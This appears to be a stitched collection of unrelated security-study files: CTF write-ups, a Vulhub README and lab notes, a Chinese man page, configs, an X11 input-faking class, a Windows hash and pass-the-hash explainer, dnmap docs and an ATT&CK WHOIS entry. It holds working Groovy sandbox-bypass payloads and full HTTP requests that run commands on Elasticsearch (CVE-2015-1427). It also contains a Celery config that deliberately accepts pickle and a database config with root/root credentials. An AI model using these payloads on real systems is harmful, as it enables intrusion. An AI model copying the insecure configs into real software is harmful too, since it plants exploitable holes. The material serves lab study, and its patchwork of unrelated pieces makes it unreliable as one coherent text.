those values from the console client from the logging we added. Then it provides us with 2 hex payloads encrypted with the same keystream. We simply copy those 2 messages to the client. Then we copy back the payloads we got. We might need to send the last message a few times until we get back 56-long message. Flag is 58 bytes long, and keystream we can get is up to 56 bytes, but last flag character is `}` so we need to test only 16 hexdigits to recover full flag. The simple session is: ``` len: 17 raw payload: 2d1f02a0a463f2bbb6dc4d89ffd3d8ed75 ('secret', '175D0CF2A765') ('How are you?', '2C5718A0A363F8F6EFE551D3') flag payload 375d0cf2a765a7f6c1e24d98eef5d8f420f4d73cb43f8fc8f02eecf2afba70d5a4072f336464fcb658f0b77225dee173e7bd8edbbce890f33a23 'How are you?' payload 2d1f02a0a331ffb9e2a604a5abd9d6ee7cb6c46ce262dbdbae39b9a2ebe320c3fd0d6070383ca7b043e4e67b3498e629b1f19fcca6b286fb Secret: WhiteHat{63638833b68d6668d67415a749ffff899e7c5c7 ``` The final flag is `WhiteHat{63638833b68d6668d67415a749ffff899e7c5c75}`
sec-knowleage
<?php // +---------------------------------------------------------------------- // | ThinkPHP [ WE CAN DO IT JUST THINK ] // +---------------------------------------------------------------------- // | Copyright (c) 2006~2016 http://thinkphp.cn All rights reserved. // +---------------------------------------------------------------------- // | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 ) // +---------------------------------------------------------------------- // | Author: liu21st <liu21st@gmail.com> // +---------------------------------------------------------------------- return [ // 数据库类型 'type' => 'mysql', // 服务器地址 'hostname' => 'mysql', // 数据库名 'database' => 'cat', // 用户名 'username' => 'root', // 密码 'password' => 'root', // 端口 'hostport' => '', // 连接dsn 'dsn' => '', // 数据库连接参数 'params' => [], // 数据库编码默认采用utf8 'charset' => 'utf8', // 数据库表前缀 'prefix' => '', // 数据库调试模式 'debug' => true, // 数据库部署方式:0 集中式(单一服务器),1 分布式(主从服务器) 'deploy' => 0, // 数据库读写是否分离 主从式有效 'rw_separate' => false, // 读写分离后 主服务器数量 'master_num' => 1, // 指定从服务器序号 'slave_no' => '', // 是否严格检查字段是否存在 'fields_strict' => true, // 数据集返回类型 array 数组 collection Collection对象 'resultset_type' => 'array', // 是否自动写入时间戳字段 'auto_timestamp' => false, // 是否需要进行SQL性能分析 'sql_explain' => false, ];
sec-knowleage
.\" Hey Emacs! This file is -*- nroff -*- source. .\" .\" This manpage is Copyright (C) 1992 Drew Eckhardt; .\" 1993 Michael Haardt, Ian Jackson. .\" .\" Permission is granted to make and distribute verbatim copies of this .\" manual provided the copyright notice and this permission notice are .\" preserved on all copies. .\" .\" Permission is granted to copy and distribute modified versions of this .\" manual under the conditions for verbatim copying, provided that the .\" entire resulting derived work is distributed under the terms of a .\" permission notice identical to this one .\" .\" Since the Linux kernel and libraries are constantly changing, this .\" manual page may be incorrect or out-of-date. The author(s) assume no .\" responsibility for errors or omissions, or for damages resulting from .\" the use of the information contained herein. The author(s) may not .\" have taken the same level of care in the production of this manual, .\" which is licensed free of charge, as they might when working .\" professionally. .\" .\" Formatted or processed versions of this manual, if unaccompanied by .\" the source, must acknowledge the copyright and authors of this work. .\" .\" Modified Sat Jul 24 13:35:59 1993 by Rik Faith <faith@cs.unc.edu> .\" Modified Sun Nov 28 17:19:01 1993 by Rik Faith <faith@cs.unc.edu> .\" Modified Sat Jan 13 12:58:08 1996 by Michael Haardt .\" <michael@cantor.informatik.rwth-aachen.de> .\" Modified Sun Jul 21 18:59:33 1996 by Andries Brouwer <aeb@cwi.nl> .\" 中文版版权所有 byeyear AND www.linuxforum.net 2002 .\" .TH WRITE 2 "13 January 1996" "Linux 2.0.32" "Linux Programmer's Manual" .SH NAME write \-在一个文件描述符上执行写操作 .SH 概述 .B #include <unistd.h> .sp .BI "ssize_t write(int " fd ", const void *" buf ", size_t " count ); .SH 描述 .B write 向文件描述符 .I fd 所引用的文件中写入 从 .I buf 开始的缓冲区中 .I count 字节的数据. POSIX规定,当使用了\fBwrite()\fP之后再使用 \fBread()\fP,那么读取到的应该是更新后的数据. 但请注意并不是所有的文件系统都是 POSIX兼容的. .SH "返回值" 成功时返回所写入的字节数(若为零则表示没有写入数据). 错误时返回\-1,并置\fIerrno\fP为相应值. 若\fIcount\fP为零,对于普通文件无任何影响,但对特殊文件 将产生不可预料的后果. .SH 错误代码 .TP .B EBADF .I fd 不是一个合法的文件描述符或者没有以写方式打开. .TP .B EINVAL .I fd 所指向的对象不可写. .TP .B EFAULT .I buf 不在用户可访问地址空间内. .TP .B EPIPE .I fd 连接到一个管道,或者套接字的读方向一端已关闭.此时写进程 将接收到 .B SIGPIPE 信号;如果此信号被捕获,阻塞或忽略,那么将返回错误 .B EPIPE. .TP .B EAGAIN 读操作阻塞,但使用 .B O_NONBLOCK 指定了非阻塞式输入输出. .TP .B EINTR 在写数据以前调用被信号中断. .TP .B ENOSPC .I fd 指向的文件所在的设备无可用空间. .TP .B EIO 当编辑一个节点时发生了底层输入输出错误. .PP 可能发生了其他错误,取决于 .IR fd 所连接的对象. .SH "兼容于" SVr4, SVID, POSIX, X/OPEN, 4.3BSD. SVr4文档添加了以下错误代码: EDEADLK, EFBIG, ENOLCK, ENOLNK, ENOSR, ENXIO, EPIPE,或者ERANGE. 对于SVr4有可能在写入部分数据时发生中断并返回EINTR. .SH "参见" .BR open (2), .BR read (2), .BR fcntl (2), .BR close (2), .BR lseek (2), .BR select (2), .BR ioctl (2), .BR fsync (2), .BR fwrite (3) .SH "[中文版维护人]" .B byeyear <love_my_love@263.net > .SH "[中文版最新更新]" .B 2002.02.07 .SH "《中国linux论坛man手册页翻译计划》:" .BI http://cmpp.linuxforum.net
sec-knowleage
## Oh Bob! (Crypto, 60p) Alice wants to send Bob a confidential message. They both remember the crypto lecture about RSA. So Bob uses openssl to create key pairs. Finally, Alice encrypts the message with Bob's public keys and sends it to Bob. Clever Eve was able to intercept it. Can you help Eve to decrypt the message? ###ENG [PL](#pl-version) In this task we got three public RSA keys and a `secret.enc` file containing three base64-encoded strings. After extracting modulus and exponent from the keys, we notice that modulus is somewhat short. After passing it to `yafu`, we found `p` and `q`, from which we could easily decrypt the messages. ###PL version W tym zadaniu dostaliśmy trzy klucze publiczne RSA, którymi zakodowano trzy wiadomości zawarte w pliku `secret.enc`. Po wyciągnięciu `n` z klucza, zauważamy że jest on dość krótki. Program `yafu` szybko sobie poradził z jego faktoryzacją, po czym odkodowaliśmy wiadomości.
sec-knowleage
from celery import Celery app = Celery('tasks', broker='redis://redis/0',backend='redis://redis/1') app.conf['CELERY_ACCEPT_CONTENT'] = ['pickle', 'json', 'msgpack', 'yaml'] @app.task def add(x, y): return x + y
sec-knowleage
<!-- markdownlint-disable first-line-heading --> <p align="center"> <img src=".github/assets/logo.svg" alt="Vulhub" height="300" /> <p align="center"> <a href="https://github.com/vulhub/vulhub/blob/master/LICENSE"> <img src="https://img.shields.io/github/license/vulhub/vulhub.svg" alt="GitHub"> </a> <a href="https://discord.gg/bQCpZEK"> <img src="https://img.shields.io/discord/485505185167179778.svg" alt="Chat on Discord"> </a> <a href="https://www.patreon.com/phith0n"> <img src="https://img.shields.io/badge/sponsor-patreon-73d6a1.svg" alt="Backers and sponors on Patreon"> </a> <a href="https://opencollective.com/vulhub#backer"> <img src="https://img.shields.io/badge/backer-opencollective-f89a76.svg" alt="Backers and sponors on Opencollective"> </a> </p> </p> Vulhub is an open-source collection of pre-built vulnerable docker environments. No pre-existing knowledge of docker is required, just execute two simple commands and you have a vulnerable environment. [中文版本(Chinese version)](README.zh-cn.md) ## Installation Install Docker on Ubuntu 22.04: ```bash # Install the latest version docker curl -s https://get.docker.com/ | sh # Run docker service systemctl start docker ``` Note that as of April 2022, `docker compose` is merged into Docker as a subcommand as [Docker Compose V2](https://www.docker.com/blog/announcing-compose-v2-general-availability/), the Python version of docker-compose will be deprecated after June 2023. So Vulhub will no longer require the installation of additional `docker-compose`, and all documentation will be modified to use the `docker compose` instead. The installation steps of Docker and Docker Compose for other operating systems might be slightly different, please refer to the [docker documentation](https://docs.docker.com/) for details. ## Usage ```bash # Download project wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip unzip vulhub-master.zip cd vulhub-master # Enter the directory of vulnerability/environment cd flask/ssti # Compile environment docker compose build # Run environment docker compose up -d ``` There is a **README** document in each environment directory, please read this file for vulnerability/environment testing and usage. After the test, delete the environment with the following command. ``` docker compose down -v ``` It is recommended to use a VPS of at least 1GB memory to build a vulnerability environment. The `your-ip` mentioned in the documentation refers to the IP address of your VPS. If you are using a virtual machine, it refers to your virtual machine IP, not the IP inside the docker container. **All environments in this project are for testing purposes only and should not be used as a production environment!** ## Notice 1. To prevent permission errors, please ensure that the docker container has permission to access all files in the current directory. 2. Vulhub does not support running on machines with non-x86 architecture such as ARM for now. ## Contribution This project relies on docker. So any error during compilation and running are thrown by docker and related programs. Please find the cause of the error by yourself first. If it is determined that the dockerfile is written incorrectly (or the code is wrong in vulhub), then submit the issue. More details please 👉[Common reasons for compilation failure](https://github.com/phith0n/vulhub/wiki/%E7%BC%96%E8%AF%91%E5%A4%B1%E8%B4%A5%E7%9A%84%E5%8E%9F%E5%9B%A0), hope it can help you. For more question, please contact: - [Discord](https://discord.gg/bQCpZEK) - [Twitter](https://twitter.com/vulhub) Thanks for the following contributors: [![](https://opencollective.com/vulhub/contributors.svg?width=890&button=false)](https://github.com/vulhub/vulhub/graphs/contributors) More contributors:[Contributors List](contributors.md) ## Partner Our Partners and users: <p> <a href="https://www.wangan.com/vulhub" target="_blank"><img src="https://vulhub.org/img/sponsor/wangan.png" width="200"></a> <a href="https://www.cvebase.com" target="_blank"><img src="https://vulhub.org/img/sponsor/cvebase.png" width="200"></a> <a href="https://www.huoxian.cn" target="_blank"><img src="https://vulhub.org/img/sponsor/huoxian.png" width="200"></a> <a href="https://www.chaitin.cn" target="_blank"><img src="https://vulhub.org/img/sponsor/chaitin.png" width="200"></a> <a href="https://xianzhi.aliyun.com/" target="_blank"><img src="https://vulhub.org/img/sponsor/aliyun.svg" width="200"></a> </p> Sponsor vulhub on patreon 🙏 <a href="https://www.patreon.com/bePatron?u=12677520"><img src="https://vulhub.org/img/sponsor/patreon.png" width="150"></a> Sponsor vulhub on opencollective 🙏 <p> <a href="https://opencollective.com/vulhub#backer"><img src="https://opencollective.com/vulhub/backers.svg?width=138"></a> <a href="https://opencollective.com/vulhub#sponsor"><img src="https://opencollective.com/vulhub/sponsors.svg?width=138"></a> </p> More [Donate](http://vulhub.org/#/docs/donate/). ## License Vulhub is licensed under the MIT License. See [LICENSE](LICENSE) for the full license text.
sec-knowleage
# ICS_CTF 学习资源 >EscortLab 收集整理了一系列相关关IoT资料,供大家学习 IoT产业资讯 https://www.iotdunia.com/iotdunia ## 利用框架 1. isf利用框架 https://github.com/dark-lbp/isf 2. isf利用框架 https://github.com/w3h/isf ## 整理ICS资源 1. icsmaster https://github.com/w3h/icsmaster 2. rapidscada https://github.com/RapidScada/scada ## 弱口令集合 1. 工控弱口令 https://github.com/scadastrangelove/SCADAPASS 2. TOP1万内系列弱口令 https://github.com/danielmiessler/SecLists/tree/master/Passwords ## 蜜罐 honeypot 1. Conpot https://github.com/mushorg/conpot ## 利用小工具 1. PLC扫描发现工具PLCscan https://code.google.com/archive/p/plcscan/source ## 工控态势感知 1. [NSA开发的工控ICS/SCADA态势感知开源工具Grassmarlin](https://github.com/iadgov/grassmarlin)
sec-knowleage
#include "xsim.h" #define XYINDEX(x, y, img) \ ((y) * img->bytes_per_line) + \ (((x) + img->xoffset) / img->bitmap_unit) * (img->bitmap_unit >> 3) XSim::XSim() { display = XOpenDisplay(NULL); if (display == NULL) { fprintf (stderr, "Can't open display!\n"); errorFlag = 1; } } XSim::~XSim() { if(image != NULL) XFree(image); image = NULL; } void XSim::getScreenshot() { if(image != NULL) XFree(image); image = XGetImage(display, DefaultRootWindow (display), 0, 0, XDisplayWidth(display, DefaultScreen (display)), XDisplayHeight(display, DefaultScreen (display)), AllPlanes, XYPixmap); } void XSim::getScreenshotRegion(int x, int y, int w, int h) { if(image != NULL) XFree(image); image = XGetImage(display, DefaultRootWindow(display), x, y, w, h, AllPlanes, XYPixmap); } void XSim::getPixel(int x, int y, Color* color) { if(image == NULL) { fprintf(stderr, "Error in taking screenshot!\n"); errorFlag = 1; return; } //XColor c; //unsigned long pixel = XGetPixel(image, x, y); unsigned long pixel = 0, px; register char *src; register char *dst; register int i, j; int bits, nbytes; long plane = 0; nbytes = image->bitmap_unit >> 3; //printf("nbytes: %d depth: %d\n", nbytes, image->depth); int pos = XYINDEX(x, y, image); for (i = image->depth; --i >= 0; ) { src = &image->data[pos + plane]; dst = (char *)&px; px = 0; for (j = nbytes; --j >= 0; ) *dst++ = *src++; bits = (x + image->xoffset) % image->bitmap_unit; pixel = (pixel << 1) | (((((char *)&px)[bits>>3])>>(bits&7)) & 1); plane = plane + (image->bytes_per_line * image->height); } color->r = (pixel & image->red_mask) >> 16; color->g = (pixel & image->green_mask) >> 8; color->b = (pixel & image->blue_mask); //printf("%d %d %d", color->r, color->g, color->b); } void XSim::queryCoords(int* x, int* y) { XEvent event; XQueryPointer (display, DefaultRootWindow (display), &event.xbutton.root, &event.xbutton.window, &event.xbutton.x_root, &event.xbutton.y_root, &event.xbutton.x, &event.xbutton.y, &event.xbutton.state); *x = event.xbutton.x; *y = event.xbutton.y; } void XSim::moveMouseTo(int x, int y) { XTestFakeMotionEvent(display, 0, x, y, CurrentTime); XFlush(display); usleep(1); } void XSim::click() { XTestFakeButtonEvent(display, 1, True, CurrentTime); //XFlush(display); //usleep(1); XTestFakeButtonEvent(display, 1, False, CurrentTime); XFlush(display); usleep(1); } void XSim::typeChar(wchar_t c) { switch(c) { case L'ą': pressK(XK_ISO_Level3_Shift); pressK(XK_aogonek); releaseK(XK_aogonek); releaseK(XK_ISO_Level3_Shift); break; case L'ę': pressK(XK_ISO_Level3_Shift); pressK(XK_eogonek); releaseK(XK_eogonek); releaseK(XK_ISO_Level3_Shift); break; case L'ć': pressK(XK_ISO_Level3_Shift); pressK(XK_cacute); releaseK(XK_cacute); releaseK(XK_ISO_Level3_Shift); break; case L'ł': pressK(XK_ISO_Level3_Shift); pressK(XK_lstroke); releaseK(XK_lstroke); releaseK(XK_ISO_Level3_Shift); break; case L'ś': pressK(XK_ISO_Level3_Shift); pressK(XK_sacute); releaseK(XK_sacute); releaseK(XK_ISO_Level3_Shift); break; case L'ó': pressK(XK_ISO_Level3_Shift); pressK(XK_oacute); releaseK(XK_oacute); releaseK(XK_ISO_Level3_Shift); break; case L'ż': pressK(XK_ISO_Level3_Shift); pressK(XK_zabovedot); releaseK(XK_zabovedot); releaseK(XK_ISO_Level3_Shift); break; case L'ź': pressK(XK_ISO_Level3_Shift); pressK(XK_zacute); releaseK(XK_zacute); releaseK(XK_ISO_Level3_Shift); break; case L'ń': pressK(XK_ISO_Level3_Shift); pressK(XK_nacute); releaseK(XK_nacute); releaseK(XK_ISO_Level3_Shift); break; default: pressK(c); releaseK(c); break; } } void XSim::pressK(int c) { XTestFakeKeyEvent(display, XKeysymToKeycode(display, c), 1, CurrentTime); //XFlush(display); //usleep(1); } void XSim::releaseK(int c) { XTestFakeKeyEvent(display, XKeysymToKeycode(display, c), 0, CurrentTime); XFlush(display); usleep(1); } void XSim::typeString(const wchar_t* str) { int n = wcslen(str); for(int i = 0; i < n; ++i) typeChar(str[i]); XFlush(display); usleep(1); } void XSim::sleepW(int microseconds) { usleep(microseconds); } int XSim::error() { return errorFlag; }
sec-knowleage
## Windows的哈希 Windows中有几种不同类型的哈希值,它们可能非常混乱。 可以在这两篇文章[《LM, NTLM, Net-NTLMv2, oh my!》](https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4)和[《LM Hash and NT Hash 》](http://www.adshotgyan.com/2012/02/lm-hash-and-nt-hash.html)找到一些解释,但首先阅读下面这段内容: 如果Windows的hash没有加盐,那么两组hash将可能产出相同的明文。Windows哈希分为两组--LMhash和NTLMhash。 比如: `testuser:29418:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71` 内容的构成: `username : unique_identifier : LMhash : NThash` * **LM** - LM哈希用于存储密码。 但要注意在W7及以上版本中LM是禁用的。 但是,当密码少于15个字符的时候,就在内存中启用LM。 这也是为什么管理员帐户的所有建议都是15个字符的原因。 LM已经过时了,它基于MD4,很容易破解。 它之所以依旧采用MD4,是因为Windows域需要较快的解密速度,但这也使得它的安全性变得很差。 * **NT** - NT哈希根据用户输入的整个密码计算哈希值。 LM哈希将密码拆分为两个7个字符的块,如果有缺省则进行填充。 * **NTLM** - NTLM哈希用于域中主机上的本地身份验证。 如上所示,它是由LM和NT哈希组合而成。 * **NetNTLMv1/2** - 有时候在网络进行身份验证的时候\(比如SMB\),有时候也会提到NTLMv2,但是请不要把它和NTLM hash搞混了,他俩是不同的概念。 在Windows中,哈希存储在内存中以用于单点登录。 每次用户点击网络共享时,信用凭证都会通过网络传递。 我们可以利用这个特性在传输过程中或在计算机上获取这些凭据。 另一种方法是始终向用户询问凭据,这在Windows环境中很少发生。 在对Windows机器进行身份验证时,NTLM哈希与明文凭证效果是一样的。因此如果你无法获取明文凭据的时候,并不要认为这是什么大问题。 其实,我的意思就是可以通过哈希传递来通过身份验证,而不需要明文密码本身。 破解哈希可以很有趣,而且由于大多数用户密码都很糟糕/不复杂,因此很容易秒破。 想象一下,如果域名的密码重置策略为90天。 但是你在两小时内就破解了用户的凭据,那这对他们来说是一个很大的失误。 如果你可以在两小时甚至几天内破解域管理员的凭证,那么它们也就离玩儿完不远了。 当然,我们可以利用中继来重用凭证,而不需破解哈希。 ## Windows中的身份验证 在Windows系统中有许多验证身份的方法。 * **密码** - 也就是密码本身了 * **Hashes** - Windows可以使用哈希进行身份验证。 因此我们可以使用重传hash等攻击来进行身份验证,完全不需要帐户密码。 * **Tokens** - 令牌属于身份验证的概念。 当用户或服务登录系统时,系统会验证一次其身份,并生成一个令牌,将该令牌将传递给该用户/服务并作为其身份。 例如,每当程序打开文件时,系统就不需要验证身份。 这基本上确保了身份验证\(证明用户/服务是他们所说的人)和授权\(确定用户/服务是否可以访问某些资源)之间的清晰分离。 * **Tickets** - 通常指Kerberos票据, 详见下文。 ## Kerberos Kerberos是Windows中基于\_tickets\_的身份验证协议,允许通过非安全网络进行通信的计算机以安全的方式相互提供其身份。 Kerberos建立在对称密钥加密之上,需要受信任的第三方参与,并且可选则在身份验证的某些阶段使用公钥加密。 Kerberos默认使用UDP端口88。 多年来,已有多个Kerberos漏洞被发现: * [MS14-068](https://www.exploit-db.com/exploits/35474/) ## Windows名称解析 Windows中有一些不同的名称解析协议和名称: * **FQDN** - 完全限定域名(Fully Qualified Domain Name) * **WINS** - Windows 网络名称服务(Windows Internet Name Service) * **NBT-NS** - \(NetBIOS Name Service\) - 通常称为 **NetBIOS** * **LLMNR** - 链路本地多播名称解析(Link-Local Multicast Name Resolution) * **WPAD** - Web代理自动发现协议(Web Proxy Auto-Discovery Protocol) 如果名称是**FQDN**,这意味着包括域名的全名,例如`test.lab.local`,它查询hosts文件,然后查询DNS服务器以进行名称解析。 如果名称是非限定名称,如`\\ fileshare`,则尝试使用以下名称解析来查找该文件共享位置: 1. **LLMNR** - 使用多播来为相邻计算机的名称执行名称解析,而无需DNS服务器。 2. **NetBIOS** - 查询WINS服务器以获取解决方案(如果存在)。 如果没有,它使用广播来解析邻近计算机的名称。 由于FQDN查找在文件共享时并不常用,并且默认情况下未启用,因此它会检查LLMNR,然后检查NetBIOS。 在企业界,DNS服务器可用于查找资源,在家庭环境中它不太能行,因此如果您想在两台主机之间共享内容,LLMNR和NetBIOS则成为不二之选。 但是,用户通常不会在资源管理器的地址字段中键入`share.hacklab.net`,因此名称解析将由LLMNR和NetBIOS来完成。
sec-knowleage
--- title: dnmap categories: Information Gathering tags: [portscanning,information gathering,recon,dnmap,kali linux] date: 2016-10-20 08:52:56 --- 0x00 dnmap介绍 ------------- dnmap(distributed nmap)是一款基于nmap的分布式扫描工具,它能够用一个集群来对另外一个大型集群网络进行扫描。 dnmap采用的是客户端/服务器体系结构,服务端主要是用来分发任务和汇总扫描状态,客户端主要用来执行扫描任务和记录自身的扫描状态。 该工具主要用于你想一个大型集群网络进行扫描,你自己拥有一个集群(肉鸡)的资源或者你的小伙伴想帮你的情况。 工具来源: http://mateslab.weebly.com/dnmap-the-distributed-nmap.html [dnmap主页][1] | [Kali dnmap Repo仓库][2] - 作者:www.mateslab.com.ar - 证书:GPLv3 0x01 dnmap_client功能 ----------------- dnmap_client - 分布式nmap框架(客户端) ```shell root@kali:~# dnmap_client -h +----------------------------------------------------------------------+ | dnmap Client Version 0.6 | | This program is free software; you can redistribute it and/or modify | | it under the terms of the GNU General Public License as published by | | the Free Software Foundation; either version 2 of the License, or | | (at your option) any later version. | | | | Author: Garcia Sebastian, eldraco@gmail.com | | www.mateslab.com.ar | +----------------------------------------------------------------------+ 用法: /usr/bin/dnmap_client <选项> 选项: -s, --server-ip dnmap服务器的IP地址 -p, --server-port dnmap服务器的IP地址端口,默认46001 -a, --alias 您的别名,以便我们可以信贷给您的帮助,可选 -d, --debug 调试 -m, --max-rate 强制命令nmap最多使用最大速率,当nmap下来时添加--max-rate参数很管用 ``` 0x02 dnmap_server功能 --------------------- dnmap_server - 分布式nmap框架(服务端) ```shell root@kali:~# dnmap_server -h +----------------------------------------------------------------------+ | dnmap_server Version 0.6 | | This program is free software; you can redistribute it and/or modify | | it under the terms of the GNU General Public License as published by | | the Free Software Foundation; either version 2 of the License, or | | (at your option) any later version. | | | | Author: Garcia Sebastian, eldraco@gmail.com | | www.mateslab.com.ar | +----------------------------------------------------------------------+ 用法: /usr/bin/dnmap_server <选项> 选项: -f, --nmap-commands Nmap命令文件 -p, --port 监听连接的TCP端口 -L, --log-file 日志文件,默认为/var/log/dnmap_server.conf -l, --log-level 日志记录级别,默认详细 -v, --verbose_level 显示执行详细级别(1-5),默认1,级别0表示无输出 -t, --client-timeout 客服端超时时间 -s, --sort 用于对静态值进行排序的字段。 您可以选择:Alias, #Commands, UpTime, RunCmdXMin, AvrCmdXMin, Status -P, --pem-file pem文件用于TLS连接,默认情况下,我们使用当前目录中的服务器提供的server.pem文件 dnmap_server使用'<nmap-commands-file-name> .dnmaptrace'文件知道它从读取nmap命令文件中继续的地方,如果你想重新开始,只需删除'<nmap-commands-file-name> .dnmaptrace'文件即可。 ``` 0x03 dnmap_client用法示例 ----------------- ```shell root@kali:~# echo "nmap -F 192.168.1.0/24 -v -n -oA sub1" >> dnmap.txt root@kali:~# echo "nmap -F 192.168.0.0/24 -v -n -oA sub0" >> dnmap.txt root@kali:~# dnmap_server -f dnmap.txt +----------------------------------------------------------------------+ | dnmap_server Version 0.6 | | This program is free software; you can redistribute it and/or modify | | it under the terms of the GNU General Public License as published by | | the Free Software Foundation; either version 2 of the License, or | | (at your option) any later version. | | | | Author: Garcia Sebastian, eldraco@gmail.com | | www.mateslab.com.ar | +----------------------------------------------------------------------+ =| MET:0:00:00.000544 | Amount of Online clients: 0 |= ``` 0x04 dnmap_server用法示例 ```shell root@kali:~# dnmap_client -s 192.168.1.15 -a dnmap-client1 +----------------------------------------------------------------------+ | dnmap Client Version 0.6 | | This program is free software; you can redistribute it and/or modify | | it under the terms of the GNU General Public License as published by | | the Free Software Foundation; either version 2 of the License, or | | (at your option) any later version. | | | | Author: Garcia Sebastian, eldraco@gmail.com | | www.mateslab.com.ar | +----------------------------------------------------------------------+ Client Started... Nmap output files stored in 'nmap_output' directory... Starting connection... Client connected succesfully... Waiting for more commands.... Command Executed: nmap -F 192.168.1.0/24 -v -n -oA sub1 ``` [1]: http://sourceforge.net/projects/dnmap/ [2]: http://git.kali.org/gitweb/?p=packages/dnmap.git;a=summary
sec-knowleage
### 杂项简介 Misc 是英文 Miscellaneous 的前四个字母,杂项、混合体、大杂烩的意思。 Misc 在国外的比赛中其实又被具体划分为各个小块,有 - Recon - Forensic - Stego - Misc - …… 在国内的比赛中,被统一划分入 Misc 领域,有时 Crypto(尤其是古典密码)也被划入其中。 在 Misc 这一章节中,将从以下几个方面介绍这一块的知识: - Recon(信息搜集) 主要介绍一些获取信息的渠道和一些利用百度、谷歌等搜索引擎的技巧 - Encode(编码转换) 主要介绍在 CTF 比赛中一些常见的编码形式以及转换的技巧和常见方式 - Forensic && Stego(数字取证 && 隐写分析) 隐写取证是 Misc 中最为重要的一块,包括文件分析、隐写、内存镜像分析和流量抓包分析等等,涉及巧妙的编码、隐藏数据、层层嵌套的文件中的文件,灵活利用搜索引擎获取所需要的信息等等。 CTF 中 Misc 与现实中的取证不同,现实中的取证很少会涉及巧妙的编码加密,数据隐藏,被分散嵌套在各处的文件字符串,或是其他脑洞类的 Challenge。很多时候是去精心恢复一个残损的文件,挖掘损坏硬盘中的蛛丝马迹,或者从内存镜像中抽取有用的信息。 现实的取证需要从业者能够找出间接的恶意行为证据:攻击者攻击系统的痕迹,或是内部威胁行为的痕迹。实际工作中计算机取证大部分是从日志、内存、文件系统中找出犯罪线索,并找出与文件或文件系统中数据的关系。而流量取证比起内容数据的分析,更注重元数据的分析,也就是当前不同端点间常用 TLS 加密的网络会话。 Misc 是切入 CTF 竞赛领域、培养兴趣的最佳入口。Misc 考察基本知识,对安全技能的各个层面都有不同程度的涉及,可以在很大程度上启发思维。
sec-knowleage
# ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞(CVE-2015-1427)测试环境 jre版本:openjdk:8-jre elasticsearch版本:v1.4.2 ## 原理 参考文章: - http://cb.drops.wiki/drops/papers-5107.html - http://jordan-wright.com/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/ - https://github.com/XiphosResearch/exploits - http://cb.drops.wiki/drops/papers-5142.html CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。本漏洞:1.是一个沙盒绕过; 2.是一个Goovy代码执行漏洞。 ## Groovy语言“沙盒” ElasticSearch支持使用“在沙盒中的”Groovy语言作为动态脚本,但显然官方的工作并没有做好。lupin和tang3分别提出了两种执行命令的方法: 1. 既然对执行Java代码有沙盒,lupin的方法是想办法绕过沙盒,比如使用Java反射 2. Groovy原本也是一门语言,于是tang3另辟蹊径,使用Groovy语言支持的方法,来直接执行命令,无需使用Java语言 所以,根据这两种执行漏洞的思路,我们可以获得两个不同的POC。 Java沙盒绕过法: ``` java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("id").getText() ``` Goovy直接执行命令法: ``` def command='id';def res=command.execute().text;res ``` ## 漏洞测试 编译及运行测试环境 ``` docker compose build docker compose up -d ``` 由于查询时至少要求es中有一条数据,所以发送如下数据包,增加一个数据: ``` POST /website/blog/ HTTP/1.1 Host: your-ip:9200 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 25 { "name": "test" } ``` 然后发送包含payload的数据包,执行任意命令: ``` POST /_search?pretty HTTP/1.1 Host: your-ip:9200 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/text Content-Length: 156 {"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}} ``` ![](1.png)
sec-knowleage
# T1596-002-搜索开放的技术数据库-WHOIS ## 来自ATT&CK的描述 在入侵受害者之前,攻击者可以在公开的WHOIS数据中搜索可在目标确定期间使用的有关受害者的信息。WHOIS数据由负责分配和分配域名等Internet资源的区域互联网注册中心(RIR)存储。任何人都可以查询WHOIS服务器以获取有关注册域的信息,例如分配的IP块,联系信息和DNS名称服务器(引自:WHOIS)。 攻击者可以搜索WHOIS数据以收集可操作的信息。威胁方可以使用在线资源或命令行实用程序对WHOIS数据进行搜刮,以获取有关潜在受害者的信息。这些来源提供的信息可能为其他形式的侦察提供可能性(例如:[主动扫描](https://contribute.knowledge.qihoo.net/detail/technique/T1595)或[钓鱼](https://contribute.knowledge.qihoo.net/detail/technique/T1598)),建立运营资源(例如:[获取基础设施](https://contribute.knowledge.qihoo.net/detail/technique/T1583)或[入侵基础设施](https://contribute.knowledge.qihoo.net/detail/technique/T1584)),或实现初始访问(例如:[外部远程服务](https://contribute.knowledge.qihoo.net/detail/technique/T1133)或[信任关系](https://contribute.knowledge.qihoo.net/detail/technique/T1199))。 ## 测试案例 whois(读作“Who is”,非缩写)是用来查询域名的IP以及所有者等信息的传输协议。简单说,whois就是一个用来查询域名是否已经被注册,以及注册域名的详细信息的数据库(如域名所有人、域名注册商)。通过whois来实现对域名信息的查询。 ### 网站查询 - 域名Whois查询 - 站长之家 - Whois 爱站 - ip138 - 域名信息查询 - 腾讯云 - nicolasbouliane - 新网 whois信息查询 - IP WHOIS查询 - 站长工具 - 微步在线 - Bugscaner ### 工具查询 在命令行输入whosi+域名 使用Nmap查询,使用这个方法还可以爆出目标的端口号开启与否:nmap --script=whois-domain +域名 ## 检测日志 无 ## 测试复现 无 ## 测试留痕 无 ## 检测规则/思路 无 ## 建议 许多此类攻击活动的发生率很高,并且相关的误报率也很高,并且有可能发生在目标组织的视野之外,从而使防御者难以发现。 检测工作可能会集中在攻击者生命周期的相关阶段,例如在"初始访问"阶段。 ## 参考推荐 MITRE-ATT&CK-T1596-002 <https://attack.mitre.org/techniques/T1596/002/> Whois信息收集及利用方式 <https://blog.csdn.net/m0_48520508/article/details/107301211> whois查询.白帽与安全 <https://www.kancloud.cn/noahs/src_hacker/2120641>
sec-knowleage
